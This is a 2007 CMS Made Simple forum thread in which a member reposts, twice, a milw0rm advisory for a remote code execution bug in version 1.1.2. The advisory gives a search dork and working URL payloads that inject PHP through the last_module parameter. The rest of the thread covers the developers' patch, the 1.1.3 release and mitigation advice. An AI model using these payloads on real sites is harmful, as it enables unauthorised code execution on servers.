CMSMS 1.1.2 Remote Code Execution Vulnerability
- johnbmcdonald
- Forum Members
- Posts: 60
- Joined: Mon May 14, 2007 8:01 pm
CMSMS 1.1.2 Remote Code Execution Vulnerability
FYI I just ran across this..
http://www.milw0rm.com/exploits/4442
# o [bug] /"*._ _ #
# . . . .-*'` `*-.._.-'/ #
# o o < * )) , ( #
# . o `*-._`._(__.--*"`.\ #
# #
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability #
# author: irk4z@yahoo.pl #
# download: #
# http://dev.cmsmadesimple.org/frs/downlo ... 2.zip #
# dork: "powered by CMS Made Simple version 1.1.2" #
# greetz: cOndemned, kacper, str0ke #
# code:
/lib/adodb_lite/adodb-perf-module.inc.php:
...
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
...
# exploit:
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]
# milw0rm.com [2007-09-21]
http://www.milw0rm.com/exploits/4442
# o [bug] /"*._ _ #
# . . . .-*'` `*-.._.-'/ #
# o o < * )) , ( #
# . o `*-._`._(__.--*"`.\ #
# #
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability #
# author: irk4z@yahoo.pl #
# download: #
# http://dev.cmsmadesimple.org/frs/downlo ... 2.zip #
# dork: "powered by CMS Made Simple version 1.1.2" #
# greetz: cOndemned, kacper, str0ke #
# code:
/lib/adodb_lite/adodb-perf-module.inc.php:
...
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
...
# exploit:
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]
# milw0rm.com [2007-09-21]
Re: CMSMS 1.1.2 Remote Code Execution Vulnerability
John,
i posted your link in the DEV-channel, to be checked.
Just for curiosity, how did you get that link, did you search......
Ronny
i posted your link in the DEV-channel, to be checked.
Just for curiosity, how did you get that link, did you search......
Ronny
-
- Support Guru
- Posts: 8169
- Joined: Tue Oct 19, 2004 6:44 pm
Re: CMSMS 1.1.2 Remote Code Execution Vulnerability
I've committed some changes that should stop this bug from happening.
Follow me on twitter
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
Re: CMSMS 1.1.2 Remote Code Execution Vulnerability
I tested this one and it only worked when register_globals was On
-
- Support Guru
- Posts: 8169
- Joined: Tue Oct 19, 2004 6:44 pm
Re: CMSMS 1.1.2 Remote Code Execution Vulnerability
Yeah, but some environments put register_globals on for some of the older forum or cart packages, etc.
Follow me on twitter
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
- johnbmcdonald
- Forum Members
- Posts: 60
- Joined: Mon May 14, 2007 8:01 pm
Re: CMSMS 1.1.2 Remote Code Execution Vulnerability
Ronny,
without the quotes.
http://www.google.com/alerts
John
When i started using this script a few months ago, I set up a google alert for "cms made simple vulnerability"John,
i posted your link in the DEV-channel, to be checked.
Just for curiosity, how did you get that link, did you search......
Ronny
without the quotes.
http://www.google.com/alerts
John
Re: CMSMS 1.1.2 Remote Code Execution Vulnerability
I see version 1.1.3 is already released in the DEV. A very fast reaction from dev team!!
-
- Support Guru
- Posts: 8169
- Joined: Tue Oct 19, 2004 6:44 pm
Re: CMSMS 1.1.2 Remote Code Execution Vulnerability
CMS Made Simple 1.1.3 is out. We've put checks into all of the adodb_lite scripts to ensure that it's being called from CMS Made Simple. This should ensure that this problem doesn't occur.
Follow me on twitter
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
- johnbmcdonald
- Forum Members
- Posts: 60
- Joined: Mon May 14, 2007 8:01 pm
Re: CMSMS 1.1.2 Remote Code Execution Vulnerability
Wow! Excellent response time!
Thanks!
John
Thanks!
John
-
- Support Guru
- Posts: 8169
- Joined: Tue Oct 19, 2004 6:44 pm
Re: CMSMS 1.1.2 Remote Code Execution Vulnerability
You caught us on a good day.
Not that good, because the first patch was messed up, but still a reasonably good day.
Not that good, because the first patch was messed up, but still a reasonably good day.
Follow me on twitter
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
Re: CMSMS 1.1.2 Remote Code Execution Vulnerability
Well done Devs ! Thank you.
@all: Please notice : URL filtering prevents such attacks because the query string contains ],[,...
Of course, filtering or not, everybody should upgrade asap.
Pierre M.
@all: Please notice : URL filtering prevents such attacks because the query string contains ],[,...
Of course, filtering or not, everybody should upgrade asap.
Pierre M.
Last edited by Pierre M. on Sun Sep 23, 2007 2:14 pm, edited 1 time in total.